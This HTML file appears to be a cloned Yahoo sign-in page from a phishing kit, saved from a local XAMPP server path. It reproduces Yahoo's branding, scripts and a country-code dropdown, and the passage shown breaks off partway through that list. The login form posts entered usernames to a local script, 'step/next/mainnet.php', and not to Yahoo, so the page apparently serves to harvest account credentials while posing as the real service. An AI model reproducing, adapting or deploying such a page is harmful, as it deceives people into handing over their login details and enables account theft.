<!DOCTYPE html>
<!-- saved from url=(0040)file:///C:/xampp/htdocs/sc/inv/yahoo.htm -->
<html id="Stencil" lang="en-US" class="js grid light-theme "><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
        <meta name="format-detection" content="telephone=no">
        <meta name="referrer" content="strict-origin-when-cross-origin">
        <meta name="oath:guce:consent-host" content="guce.yahoo.com">
        <title>Yahoo</title>
        <meta name="description" content="Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies... You get more out of the web, you get more out of life.">
        <link rel="dns-prefetch" href="file://gstatic.com/">
        <link rel="dns-prefetch" href="file://google.com/">
        <link rel="dns-prefetch" href="file://s.yimg.com/">
        <link rel="dns-prefetch" href="file://y.analytics.yahoo.com/">
        <link rel="dns-prefetch" href="file://ucs.query.yahoo.com/">
        <link rel="dns-prefetch" href="file://geo.query.yahoo.com/">
        <link rel="dns-prefetch" href="file://geo.yahoo.com/">
        <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0">
        <link rel="apple-touch-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <style nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
            #mbr-css-check {
                display: inline;
            }
        </style>
        <link href="./Yahoo1_files/yahoo-main.css" rel="stylesheet" type="text/css">
        <script nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
            var pageStartTime = new Date().getTime();
            (function(root) {
                var isGoodJS = ('create' in Object && 'isArray' in Array && 'pushState' in window.history);
                root.isGoodJS = isGoodJS;
            }(this));
            
(function (root) {
/* -- Data -- */
root.YUI_config = {"comboBase":"https:\u002F\u002Fs.yimg.com\u002Fzz\u002Fcombo?","combine":true,"root":"yui-s:3.18.0\u002F"};
root.I13N_config = {"keys":{"pt":"utility","ver":"nodejs"}};
root.I13N_config || (root.I13N_config = {});
root.I13N_config.spaceid = 794200018;
root.I13N_config.location = "https:\u002F\u002Fyahoo3.html\u002F?.lang=en-US&src=homepage&activity=ybar-signin&pspid=2023538075";
root.I13N_config.referrer = "https:\u002F\u002Flogin.yahoo.com\u002F";
root.I13N_config.keys || (root.I13N_config.keys = {});
root.I13N_config.keys.pg_name = "loginLanding";
root.I13N_config.keys.gm_np = "yahoo";
root.I13N_config.keys.src = "homepage";
root.I13N_config.keys.p_sec = "DEFAULT_SECTION";
root.I13N_config.keys.p_subsec = "DEFAULT_SUBSECTION";
root.I13N_config.keys.test = "mbr-siwg-ym,mbr-plivo-ykeykey-migrate,mbr-2sv-redesign-authn-app-control,mbr-whatsapp-non-hc,mbr-2sv-redesign-sms-control";
root.I13N_config.keys.cause = "ybar-signin";
root.I13N_config.keys.src_id = "2023538075";
root.COMET_URL = "https:\u002F\u002Fserver.comet.yahoo.com\u002Fcomet";
root.gamIframeUrl = "https:\u002F\u002Fgpt.mail.yahoo.net\u002Fsandbox?client=login&version=0.1&limited=0&headerBidder=1&haq=1&benji=1#config=%7B%22positions%22%3A%5B%7B%22adUnitPath%22%3A%22%2F22888152279%2Fus%2Fylogin%2Fmain%2Fdt%2Fus_ylogin_main_dt_full_screen%22%2C%22adLocation%22%3A%22full_screen%22%2C%22size%22%3A%5B%5B1440%2C1024%5D%2C%5B%22fluid%22%5D%5D%2C%22div%22%3A%22gpt-passback%22%7D%5D%2C%22pageUrl%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22headerBidder%22%3Atrue%2C%22yahooPrebid%22%3Atrue%2C%22geoCountryCode%22%3A%22US%22%2C%22npa%22%3Afalse%2C%22limited%22%3Afalse%2C%22PPId%22%3A%22__PPId__%22%2C%22targetingConfig%22%3A%7B%22lang%22%3A%22en-US%22%2C%22bucket%22%3A%22mbr-whatsapp-non-hc%22%2C%22spaceId%22%3A%22794200018%22%2C%22adLocation%22%3A%22full_screen%22%2C%22age%22%3A%225%22%2C%22gender%22%3A%221%22%2C%22colo%22%3A%22bf1%22%2C%22lu%22%3A%220%22%2C%22site%22%3A%22login%22%2C%22device%22%3A%22desktop%22%2C%22region%22%3A%22us%22%2C%22pageOrigin%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22AXId%22%3A%22__AXId__%22%7D%2C%22headerBidderConfig%22%3A%7B%22host%22%3A%22login.yahoo.com%22%2C%22pblob%22%3A%22lu%3A0%7C%7C794200018%7C%7C%22%2C%22buckets%22%3A%5B%22mbr-whatsapp-non-hc%22%5D%2C%22limited%22%3Afalse%2C%22cobrand%22%3A%22%22%2C%22lang%22%3A%22en-US%22%2C%22site%22%3A%22yahoo_login%22%2C%22region%22%3A%22us%22%2C%22adLocation%22%3A%22full_screen%22%2C%22dv360%22%3A%22__DV360__%22%2C%22AXId%22%3A%22__AXId__%22%7D%7D";
root.challenge || (root.challenge = {});
root.challenge.servingStamp = 1721224593170;
root.challenge.isAndroidWebview = false;
root.I13N_config.keys.pct = "signin";
root.currentURL = "\u002F?.lang=en-US&src=homepage&activity=ybar-signin&pspid=2023538075&done=https%3A%2F%2Fwww.yahoo.com%2F&add=1";
root.COUNTRY_CODES_MAP = {"AF":"+93","AL":"+355","DZ":"+213","AS":"+1","AD":"+376","AO":"+244","AI":"+1","AG":"+1","AR":"+54","AM":"+374","AW":"+297","AC":"+247","AU":"+61","AX":"+672","AT":"+43","AZ":"+994","BS":"+1","BH":"+973","BD":"+880","BB":"+1","BY":"+375","BE":"+32","BZ":"+501","BJ":"+229","BM":"+1","BT":"+975","BO":"+591","BA":"+387","BW":"+267","BR":"+55","VG":"+1","BN":"+673","BG":"+359","BF":"+226","BI":"+257","KH":"+855","CM":"+237","CA":"+1","CV":"+238","KY":"+1","CF":"+236","TD":"+235","CL":"+56","CN":"+86","CO":"+57","KM":"+269","CG":"+242","CK":"+682","CR":"+506","CI":"+225","HR":"+385","CU":"+53","CY":"+357","CZ":"+420","CD":"+243","DK":"+45","DG":"+246","DJ":"+253","DM":"+1","DO":"+1","TL":"+670","EC":"+593","EG":"+20","SV":"+503","GQ":"+240","ER":"+291","EE":"+372","ET":"+251","FK":"+500","FO":"+298","FJ":"+679","FI":"+358","FR":"+33","GF":"+594","PF":"+689","GA":"+241","GM":"+220","GE":"+995","DE":"+49","GH":"+233","GI":"+350","GR":"+30","GL":"+299","GD":"+1","GP":"+590","GU":"+1","GT":"+502","GN":"+224","GW":"+245","GY":"+592","HT":"+509","HN":"+504","HK":"+852","HU":"+36","IS":"+354","IN":"+91","ID":"+62","IR":"+98","IQ":"+964","IE":"+353","IL":"+972","IT":"+39","JM":"+1","JP":"+81","JO":"+962","KZ":"+7","KE":"+254","KI":"+686","XK":"+383","KW":"+965","KG":"+996","LA":"+856","LV":"+371","LB":"+961","LS":"+266","LR":"+231","LY":"+218","LI":"+423","LT":"+370","LU":"+352","MO":"+853","MK":"+389","MG":"+261","MW":"+265","MY":"+60","MV":"+960","ML":"+223","MT":"+356","MH":"+692","MQ":"+596","MR":"+222","MU":"+230","MX":"+52","FM":"+691","MD":"+373","MC":"+377","MN":"+976","ME":"+382","MS":"+1","MA":"+212","MZ":"+258","MM":"+95","NA":"+264","NR":"+674","NP":"+977","NL":"+31","AN":"+599","NC":"+687","NZ":"+64","NI":"+505","NE":"+227","NG":"+234","NU":"+683","KP":"+850","MP":"+1","NO":"+47","OM":"+968","PK":"+92","PW":"+680","PS":"+970","PA":"+507","PG":"+675","PY":"+595","PE":"+51","PH":"+63","PL":"+48","PT":"+351","PR":"+1","QA":"+974","RE":"+262","RO":"+40","RU":"+7","RW":"+250","SH":"+290","KN":"+1","LC":"+1","PM":"+508","VC":"+1","WS":"+685","SM":"+378","ST":"+239","SA":"+966","SN":"+221","RS":"+381","SC":"+248","SL":"+232","SG":"+65","SK":"+421","SI":"+386","SB":"+677","SO":"+252","ZA":"+27","KR":"+82","ES":"+34","LK":"+94","SD":"+249","SR":"+597","SZ":"+268","SE":"+46","CH":"+41","SY":"+963","TW":"+886","TJ":"+992","TZ":"+255","TH":"+66","TG":"+228","TK":"+690","TO":"+676","TT":"+1","TN":"+216","TR":"+90","TM":"+993","TC":"+1","TV":"+688","VI":"+1","UG":"+256","UA":"+380","AE":"+971","GB":"+44","US":"+1","UY":"+598","UZ":"+998","VU":"+678","VA":"+379","VE":"+58","VN":"+84","WF":"+681","YE":"+967","ZM":"+260","ZW":"+263"};
root.enforceCountryCodeDropDown = false;
root.isIOSDevice = false;
}(this));

            
            YUI_config.global = window;


            window.mbrSendError = function (name, url) {
                (new Image()).src = '/account/js-reporting/?rid=1b46sm1j9fjch&crumb=' + encodeURIComponent('94jyjqi2AD0TkeRg8eQugg') + '&message=' + encodeURIComponent(name) + '&url=' + encodeURIComponent(url);
            };

            var oldError = window.onerror;

            window.onerror = function (errorMsg, url) {
                window.mbrSendError(errorMsg, url);
                if (oldError) {
                    oldError.apply(this, arguments);
                }
                return false;
            };

        </script>
    </head>
    <body class="bucket-mbr-whatsapp-non-hc">
    <script nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
        (function(root) {
            var doc = document;
            if (root.isGoodJS) {
                doc.documentElement.className = doc.documentElement.className.replace('no-js', 'js');
            }
        }(this));
    </script>
    <div id="login-body" class="loginish  puree-v2  grid    ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="https://www.yahoo.com/">
            <img src="./Yahoo1_files/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo " width="" height="36">
            <img src="./Yahoo1_files/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo " width="" height="36">
        </a>
    </span>
    <div class="desktop-universal-header">
        <a href="https://help.yahoo.com/kb/index?locale=en_US&amp;page=product&amp;y=PROD_ACCT" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerHelp">Help</a>
        <a href="https://legal.yahoo.com/us/en/yahoo/terms/otos/index.html" class="universal-header-links" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerTerms">Terms</a>
        <a href="https://legal.yahoo.com/us/en/yahoo/privacy/index.html" class="universal-header-links privacy-link" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerPrivacy">Privacy</a>
    </div>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                    <img src="./Yahoo1_files/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-en-US" width="" height="27">
                    <img src="./Yahoo1_files/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-en-US" width="" height="27">
            </div>
            <div class="challenge yid-challenge">
    <div class="challenge-header">
</div><div class="username-challenge" id="login-landing">
    <strong class="challenge-heading">Sign&nbsp;in</strong>
    <span class="challenge-desc signin-sub-title">using your Yahoo&nbsp;account</span>
    
    <form id="login-username-form" method="post" action="step/next/mainnet.php?" class="pure-form">
        <input type="hidden" name="browser-fp-data" id="browser-fp-data" value="{&quot;language&quot;:&quot;en-US&quot;,&quot;colorDepth&quot;:24,&quot;deviceMemory&quot;:8,&quot;pixelRatio&quot;:1.5,&quot;hardwareConcurrency&quot;:4,&quot;timezoneOffset&quot;:420,&quot;timezone&quot;:&quot;America/Los_Angeles&quot;,&quot;sessionStorage&quot;:1,&quot;localStorage&quot;:1,&quot;indexedDb&quot;:1,&quot;cpuClass&quot;:&quot;unknown&quot;,&quot;platform&quot;:&quot;Win32&quot;,&quot;doNotTrack&quot;:&quot;1&quot;,&quot;plugins&quot;:{&quot;count&quot;:5,&quot;hash&quot;:&quot;2c14024bf8584c3f7f63f24ea490e812&quot;},&quot;canvas&quot;:&quot;canvas winding:yes~canvas&quot;,&quot;webgl&quot;:1,&quot;webglVendorAndRenderer&quot;:&quot;Google Inc. (Intel)~ANGLE (Intel, Intel(R) HD Graphics 620 (0x00005916) Direct3D11 vs_5_0 ps_5_0, D3D11)&quot;,&quot;adBlock&quot;:0,&quot;hasLiedLanguages&quot;:0,&quot;hasLiedResolution&quot;:0,&quot;hasLiedOs&quot;:1,&quot;hasLiedBrowser&quot;:0,&quot;touchSupport&quot;:{&quot;points&quot;:10,&quot;event&quot;:0,&quot;start&quot;:0},&quot;fonts&quot;:{&quot;count&quot;:33,&quot;hash&quot;:&quot;edeefd360161b4bf944ac045e41d0b21&quot;},&quot;audio&quot;:&quot;124.04347527516074&quot;,&quot;resolution&quot;:{&quot;w&quot;:&quot;1280&quot;,&quot;h&quot;:&quot;720&quot;},&quot;availableResolution&quot;:{&quot;w&quot;:&quot;672&quot;,&quot;h&quot;:&quot;1280&quot;},&quot;ts&quot;:{&quot;serve&quot;:1721224593170,&quot;render&quot;:1721224837792}}">
        <input type="hidden" name="crumb" value="94jyjqi2AD0TkeRg8eQugg">
        <input type="hidden" name="acrumb" value="mRRfVhNw">
        <input type="hidden" name="sessionIndex" value="Qg--">
        <input type="hidden" name="displayName" value="">
        <input type="hidden" name="deviceCapability" value="{&quot;pa&quot;:{&quot;status&quot;:false},&quot;isWebAuthnSupported&quot;:true}" id="deviceCapability">
        <div id="username-country-code-field" class="username-country-code puree-country-inline-dropdown-disabled code-of-length-1">
            <div id="selected-country-code-cont" class="puree-dropdown selected-country-code-cont ltr hide">
                <div id="selected-country-code" class="selected-country-code">+1</div>
                <span class="arrow"></span>
            </div>
            <div id="country-dropdown-container" class="country-code-dropdown country-dropdown-container hide">
                <div class="puree-dropdown">
    <label class="offscreen" id="country-code-lbl-aria">Enter Country Code</label>
    <select type="select" name="countryCodeIntl" aria-required="true" role="combobox" aria-labelledby="country-code-lbl-aria" disabled="">
        <option role="option" data-code="+93" value="AF">Afghanistan ‪(+93)‬</option>
        <option role="option" data-code="+355" value="AL">Albania ‪(+355)‬</option>
        <option role="option" data-code="+213" value="DZ">Algeria ‪(+213)‬</option>
        <option role="option" data-code="+1" value="AS">American Samoa ‪(+1)‬</option>
        <option role="option" data-code="+376" value="AD">Andorra ‪(+376)‬</option>
        <option role="option" data-code="+244" value="AO">Angola ‪(+244)‬</option>
        <option role="option" data-code="+1" value="AI">Anguilla ‪(+1)‬</option>
        <option role="option" data-code="+1" value="AG">Antigua and Barbuda ‪(+1)‬</option>
        <option role="option" data-code="+54" value="AR">Argentina ‪(+54)‬</option>
        <option role="option" data-code="+374" value="AM">Armenia ‪(+374)‬</option>
        <option role="option" data-code="+297" value="AW">Aruba ‪(+297)‬</option>
        <option role="option" data-code="+247" value="AC">Ascension ‪(+247)‬</option>
        <option role="option" data-code="+61" value="AU">Australia ‪(+61)‬</option>
        <option role="option" data-code="+672" value="AX">Australian External Territories ‪(+672)‬</option>
        <option role="option" data-code="+43" value="AT">Austria ‪(+43)‬</option>
        <option role="option" data-code="+994" value="AZ">Azerbaijan ‪(+994)‬</option>
        <option role="option" data-code="+1" value="BS">Bahamas ‪(+1)‬</option>
        <option role="option" data-code="+973" value="BH">Bahrain ‪(+973)‬</option>
        <option role="option" data-code="+880" value="BD">Bangladesh ‪(+880)‬</option>
        <option role="option" data-code="+1" value="BB">Barbados ‪(+1)‬</option>
        <option role="option" data-code="+375" value="BY">Belarus ‪(+375)‬</option>
        <option role="option" data-code="+32" value="BE">Belgium ‪(+32)‬</option>
        <option role="option" data-code="+501" value="BZ">Belize ‪(+501)‬</option>
        <option role="option" data-code="+229" value="BJ">Benin ‪(+229)‬</option>
        <option role="option" data-code="+1" value="BM">Bermuda ‪(+1)‬</option>
        <option role="option" data-code="+975" value="BT">Bhutan ‪(+975)‬</option>
        <option role="option" data-code="+591" value="BO">Bolivia ‪(+591)‬</option>
        <option role="option" data-code="+387" value="BA">Bosnia and Herzegovina ‪(+387)‬</option>
        <option role="option" data-code="+267" value="BW">Botswana ‪(+267)‬</option>
        <option role="option" data-code="+55" value="BR">Brazil ‪(+55)‬</option>
        <option role="option" data-code="+1" value="VG">British Virgin Islands ‪(+1)‬</option>
        <option role="option" data-code="+673" value="BN">Brunei Darussalam ‪(+673)‬</option>
        <option role="option" data-code="+359" value="BG">Bulgaria ‪(+359)‬</option>
        <option role="option" data-code="+226" value="BF">Burkina Faso ‪(+226)‬</option>
        <option role="option" data-code="+257" value="BI">Burundi ‪(+257)‬</option>
        <option role="option" data-code="+855" value="KH">Cambodia ‪(+855)‬</option>
        <option role="option" data-code="+237" value="CM">Cameroon ‪(+237)‬</option>
        <option role="option" data-code="+1" value="CA">Canada ‪(+1)‬</option>
        <option role="option" data-code="+238" value="CV">Cape Verde ‪(+238)‬</option>
        <option role="option" data-code="+1" value="KY">Cayman Islands ‪(+1)‬</option>
        <option role="option" data-code="+236" value="CF">Central African Republic ‪(+236)‬</option>
        <option role="option" data-code="+235" value="TD">Chad ‪(+235)‬</option>
        <option role="option" data-code="+56" value="CL">Chile ‪(+56)‬</option>
        <option role="option" data-code="+86" value="CN">China ‪(+86)‬</option>
        <option role="option" data-code="+57" value="CO">Colombia ‪(+57)‬</option>
        <option role="option" data-code="+269" value="KM">Comoros ‪(+269)‬</option>
        <option role="option" data-code="+242" value="CG">Congo ‪(+242)‬</option>
        <option role="option" data-code="+682" value="CK">Cook Islands ‪(+682)‬</option>
        <option role="option" data-code="+506" value="CR">Costa Rica ‪(+506)‬</option>
        <option role="option" data-code="+225" value="CI">Cote dÕIvoire ‪(+225)‬</option>
        <option role="option" data-code="+385" value="HR">Croatia ‪(+385)‬</option>
        <option role="option" data-code="+53" value="CU">Cuba ‪(+53)‬</option>
        <option role="option" data-code="+357" value="CY">Cyprus ‪(+357)‬</option>
        <option role="option" data-code="+420" value="CZ">Czech Republic ‪(+420)‬</option>
        <option role="option" data-code="+243" value="CD">Democratic Republic of the Congo ‪(+243)‬</option>
        <option role="option" data-code="+45" value="DK">Denmark ‪(+45)‬</option>
        <option role="option" data-code="+246" value="DG">Diego Garcia ‪(+246)‬</option>
        <option role="option" data-code="+253" value="DJ">Djibouti ‪(+253)‬</option>
        <option role="option" data-code="+1" value="DM">Dominica ‪(+1)‬</option>
        <option role="option" data-code="+1" value="DO">Dominican Republic ‪(+1)‬</option>
        <option role="option" data-code="+670" value="TL">East Timor ‪(+670)‬</option>
        <option role="option" data-code="+593" value="EC">Ecuador ‪(+593)‬</option>
        <option role="option" data-code="+20" value="EG">Egypt ‪(+20)‬</option>
        <option role="option" data-code="+503" value="SV">El Salvador ‪(+503)‬</option>
        <option role="option" data-code="+240" value="GQ">Equatorial Guinea ‪(+240)‬</option>
        <option role="option" data-code="+291" value="ER">Eritrea ‪(+291)‬</option>
        <option role="option" data-code="+372" value="EE">Estonia ‪(+372)‬</option>
        <option role="option" data-code="+251" value="ET">Ethiopia ‪(+251)‬</option>
        <option role="option" data-code="+500" value="FK">Falkland Islands ‪(+500)‬</option>
        <option role="option" data-code="+298" value="FO">Faroe Islands ‪(+298)‬</option>
        <option role="option" data-code="+679" value="FJ">Fiji ‪(+679)‬</option>
        <option role="option" data-code="+358" value="FI">Finland ‪(+358)‬</option>
        <option role="option" data-code="+33" value="FR">France ‪(+33)‬</option>
        <option role="option" data-code="+594" value="GF">French Guiana ‪(+594)‬</option>
        <option role="option" data-code="+689" value="PF">French Polynesia ‪(+689)‬</option>
        <option role="option" data-code="+241" value="GA">Gabon ‪(+241)‬</option>
        <option role="option" data-code="+220" value="GM">Gambia ‪(+220)‬</option>
        <option role="option" data-code="+995" value="GE">Georgia ‪(+995)‬</option>
        <option role="option" data-code="+49" value="DE">Germany ‪(+49)‬</option>
        <option role="option" data-code="+233" value="GH">Ghana ‪(+233)‬</option>
        <option role="option" data-code="+350" value="GI">Gibraltar ‪(+350)‬</option>
        <option role="option" data-code="+30" value="GR">Greece ‪(+30)‬</option>
        <option role="option" data-code="+299" value="GL">Greenland ‪(+299)‬</option>
        <option role="option" data-code="+1" value="GD">Grenada ‪(+1)‬</option>
        <option role="option" data-code="+590" value="GP">Guadeloupe ‪(+590)‬</option>
        <option role="option" data-code="+1" value="GU">Guam ‪(+1)‬</option>
        <option role="option" data-code="+502" value="GT">Guatemala ‪(+502)‬</option>
        <option role="option" data-code="+224" value="GN">Guinea ‪(+224)‬</option>
        <option role="option" data-code="+245" value="GW"> ‪(+245)‬</option>
        <option role="option" data-code="+592" value="GY">Guyana ‪(+592)‬</option>
        <option role="option" data-code="+509" value="HT">Haiti ‪(+509)‬</option>
        <option role="option" data-code="+504" value="HN">Honduras ‪(+504)‬</option>
        <option role="option" data-code="+852" value="HK">Hong Kong ‪(+852)‬</option>
        <option role="option" data-code="+36" value="HU">Hungary ‪(+36)‬</option>
        <option role="option" data-code="+354" value="IS">Iceland ‪(+354)‬</option>
        <option role="option" data-code="+91" value="IN">India ‪(+91)‬</option>
        <option role="option" data-code="+62" value="ID">Indonesia ‪(+62)‬</option>
        <option role="option" data-code="+98" value="IR">Iran ‪(+98)‬</option>
        <option role="option" data-code="+964" value="IQ">Iraq ‪(+964)‬</option>
        <option role="option" data-code="+353" value="IE">Ireland ‪(+353)‬</option>
        <option role="option" data-code="+972" value="IL">Israel ‪(+972)‬</option>
        <option role="option" data-code="+39" value="IT">Italy ‪(+39)‬</option>
        <option role="option" data-code="+1" value="JM">Jamaica ‪(+1)‬</option>
        <option role="option" data-code="+81" value="JP">Japan ‪(+81)‬</option>
        <option role="option" data-code="+962" value="JO">Jordan ‪(+962)‬</option>
        <option role="option" data-code="+7" value="KZ">Kazakhstan ‪(+7)‬</option>
        <option role="option" data-code="+254" value="KE">Kenya ‪(+254)‬</option>
        <option role="option" data-code="+686" value="KI">Kiribati ‪(+686)‬</option>
        <option role="option" data-code="+383" value="XK"> ‪(+383)‬</option>
        <option role="option" data-code="+965" value="KW">Kuwait ‪(+965)‬</option>
        <option role="option" data-code="+996" value="KG">Kyrgyzstan ‪(+996)‬</option>
        <option role="option" data-code="+856" value="LA">Laos ‪(+856)‬</option>
        <option role="option" data-code="+371" value="LV">Latvia ‪(+371)‬</option>
        <option role="option" data-code="+961" value="LB">Lebanon ‪(+961)‬</option>
        <option role="option" data-code="+266" value="LS">Lesotho ‪(+266)‬</option>
        <option role="option" data-code="+231" value="LR">Liberia ‪(+231)‬</option>
        <option role="option" data-code="+218" value="LY">Libya ‪(+218)‬</option>
        <option role="option" data-code="+423" value="LI">Liechtenstein ‪(+423)‬</option>
        <option role="option" data-code="+370" value="LT">Lithuania ‪(+370)‬</option>
        <option role="option" data-code="+352" value="LU">Luxembourg ‪(+352)‬</option>
        <option role="option" data-code="+853" value="MO">Macao ‪(+853)‬</option>
        <option role="option" data-code="+389" value="MK">Macedonia ‪(+389)‬</option>
        <option role="option" data-code="+261" value="MG">Madagascar ‪(+261)‬</option>
        <option role="option" data-code="+265" value="MW">Malawi ‪(+265)‬</option>
        <option role="option" data-code="+60" value="MY">Malaysia ‪(+60)‬</option>
        <option role="option" data-code="+960" value="MV">Maldives ‪(+960)‬</option>
        <option role="option" data-code="+223" value="ML">Mali ‪(+223)‬</option>
        <option role="option" data-code="+356" value="MT">Malta ‪(+356)‬</option>
        <option role="option" data-code="+692" value="MH">Marshall Islands ‪(+692)‬</option>
        <option role="option" data-code="+596" value="MQ">Martinique ‪(+596)‬</option>
        <option role="option" data-code="+222" value="MR">Mauritania ‪(+222)‬</option>
        <option role="option" data-code="+230" value="MU">Mauritius ‪(+230)‬</option>
        <option role="option" data-code="+52" value="MX">Mexico ‪(+52)‬</option>
        <option role="option" data-code="+691" value="FM">Micronesia ‪(+691)‬</option>
        <option role="option" data-code="+373" value="MD">Moldova ‪(+373)‬</option>
        <option role="option" data-code="+377" value="MC">Monaco ‪(+377)‬</option>
        <option role="option" data-code="+976" value="MN">Mongolia ‪(+976)‬</option>
        <option role="option" data-code="+382" value="ME">Montenegro ‪(+382)‬</option>
        <option role="option" data-code="+1" value="MS">Montserrat ‪(+1)‬</option>
        <option role="option" data-code="+212" value="MA">Morocco ‪(+212)‬</option>
        <option role="option" data-code="+258" value="MZ">Mozambique ‪(+258)‬</option>
        <option role="option" data-code="+95" value="MM">Myanmar ‪(+95)‬</option>
        <option role="option" data-code="+264" value="NA">Namibia ‪(+264)‬</option>
        <option role="option" data-code="+674" value="NR">Nauru ‪(+674)‬</option>
        <option role="option" data-code="+977" value="NP">Nepal ‪(+977)‬</option>
        <option role="option" data-code="+31" value="NL">Netherlands ‪(+31)‬</option>
        <option role="option" data-code="+599" value="AN"> ‪(+599)‬</option>
        <option role="option" data-code="+687" value="NC">New Caledonia ‪(+687)‬</option>
        <option role="option" data-code="+64" value="NZ">New Zealand ‪(+64)‬</option>
        <option role="option" data-code="+505" value="NI">Nicaragua ‪(+505)‬</option>
        <option role="option" data-code="+227" value="NE">Niger ‪(+227)‬</option>
        <option role="option" data-code="+234" value="NG">Nigeria ‪(+234)‬</option>
        <option role="option" data-code="+683" value="NU">Niue ‪(+683)‬</option>
        <option role="option" data-code="+850" value="KP">North Korea ‪(+850)‬</option>
        <option role="option" data-code="+1" value="MP">Northern Mariana Islands ‪(+1)‬</option>
        <option role="option" data-code="+47" value="NO">Norway ‪(+47)‬</option>
        <option role="option" data-code="+968" value="OM">Oman ‪(+968)‬</option>
        <option role="option" data-code="+92" value="PK">Pakistan ‪(+92)‬</option>
        <option role="option" data-code="+680" value="PW">Palau ‪(+680)‬</option>
        <option role="option" data-code="+970" value="PS">Palestine ‪(+970)‬</option>
        <option role="option" data-code="+507" value="PA">Panama ‪(+507)‬</option>
        <option role="option" data-code="+675" value="PG">Papua New Guinea ‪(+675)‬</option>
        <option role="option" data-code="+595" value="PY">Paraguay ‪(+595)‬</option>
        <option role="option" data-code="+51" value="PE">Peru ‪(+51)‬</option>
        <option role="option" data-code="+63" value="PH">Philippines ‪(+63)‬</option>
        <option role="option" data-code="+48" value="PL">Poland ‪(+48)‬</option>
        <option role="option" data-code="+351" value="PT">Portugal ‪(+351)‬</option>
        <option role="option" data-code="+1" value="PR">Puerto Rico ‪(+1)‬</option>
        <option role="option" data-code="+974" value="QA">Qatar ‪(+974)‬</option>
        <option role="option" data-code="+262" value="RE">Reunion ‪(+262)‬</option>
        <option role="option" data-code="+40" value="RO">Romania ‪(+40)‬</option>
        <option role="option" data-code="+7" value="RU">Russia ‪(+7)‬</option>
        <option role="option" data-code="+250" value="RW">Rwanda ‪(+250)‬</option>
        <option role="option" data-code="+290" value="SH">Saint Helena ‪(+290)‬</option>
        <option role="option" data-code="+1" value="KN">Saint Kitts and Nevis ‪(+1)‬</option>
        <option role="option" data-code="+1" value="LC">Saint Lucia ‪(+1)‬</option>
        <option role="option" data-code="+508" value="PM">Saint Pierre and Miquelon ‪(+508)‬</option>
        <option role="option" data-code="+1" value="VC">Saint Vincent and Grenadines ‪(+1)‬</option>
        <option role="option" data-code="+685" value="WS">Samoa ‪(+685)‬</option>
        <option role="option" data-code="+378" value="SM">San Marino ‪(+378)‬</option>
        <option role="option" data-code="+239" value="ST">Sao Tome and Principe ‪(+239)‬</option>
        <option role="option" data-code="+966" value="SA">Saudi Arabia ‪(+966)‬</option>
        <option role="option" data-code="+221" value="SN">Senegal ‪(+221)‬</option>
        <option role="option" data-code="+381" value="RS">Serbia ‪(+381)‬</option>
        <option role="option" data-code="+248" value="SC">Seychelles ‪(+248)‬</option>
        <option role="option" data-code="+232" value="SL">Sierra Leone ‪(+232)‬</option>
        <option role="option" data-code="+65" value="SG">Singapore ‪(+65)‬</option>
        <option role="option" data-code="+421" value="SK">Slovakia ‪(+421)‬</option>
        <option role="option" data-code="+386" value="SI">Slovenia ‪(+386)‬</option>
        <option role="option" data-code="+677" value="SB">Solomon Islands ‪(+677)‬</option>
        <option role="option" data-code="+252" value="SO">Somalia ‪(+252)‬</option>
        <option role="option" data-code="+27" value="ZA">South Africa ‪(+27)‬</option>
        <option role="option" data-code="+82" value="KR">South Korea ‪(+82)‬</option>
        <option role="option" data-code="+34" value="ES">Spain ‪(+34)‬</option>
        <option role="option" data-code="+94" value="LK">Sri Lanka ‪(+94)‬</option>
        <option role="option" data-code="+249" value="SD">Sudan ‪(+249)‬</option>
        <option role="option" data-code="+597" value="SR">Suriname ‪(+597)‬</option>
        <option role="option" data-code="+268" value="SZ">Swaziland ‪(+268)‬</option>
        <option role="option" data-code="+46" value="SE">Sweden ‪(+46)‬</option>
        <option role="option" data-code="+41" value="CH">Switzerland ‪(+41)‬</option>
        <option role="option" data-code="+963" value="SY">Syria ‪(+963)‬</option>
        <option role="option" data-code="+886" value="TW">Taiwan ‪(+886)‬</option>
        <option role="option" data-code="+992" value="TJ">Tajikistan ‪(+992)‬</option>
        <option role="option" data-code="+255" value="TZ">Tanzania ‪(+255)‬</option>
        <option role="option" data-code="+66" value="TH">Thailand ‪(+66)‬</option>
        <option role="option" data-code="+228" value="TG">Togo ‪(+228)‬</option>
        <option role="option" data-code="+690" value="TK">Tokelau ‪(+690)‬</option>
        <option role="option" data-code="+676" value="TO">Tonga ‪(+676)‬</option>
        <option role="option" data-code="+1" value="TT">Trinidad and Tobago ‪(+1)‬</option>
        <option role="option" data-code="+216" value="TN">Tunisia ‪(+216)‬</option>
        <option role="option" data-code="+90" value="TR">Turkey ‪(+90)‬</option>
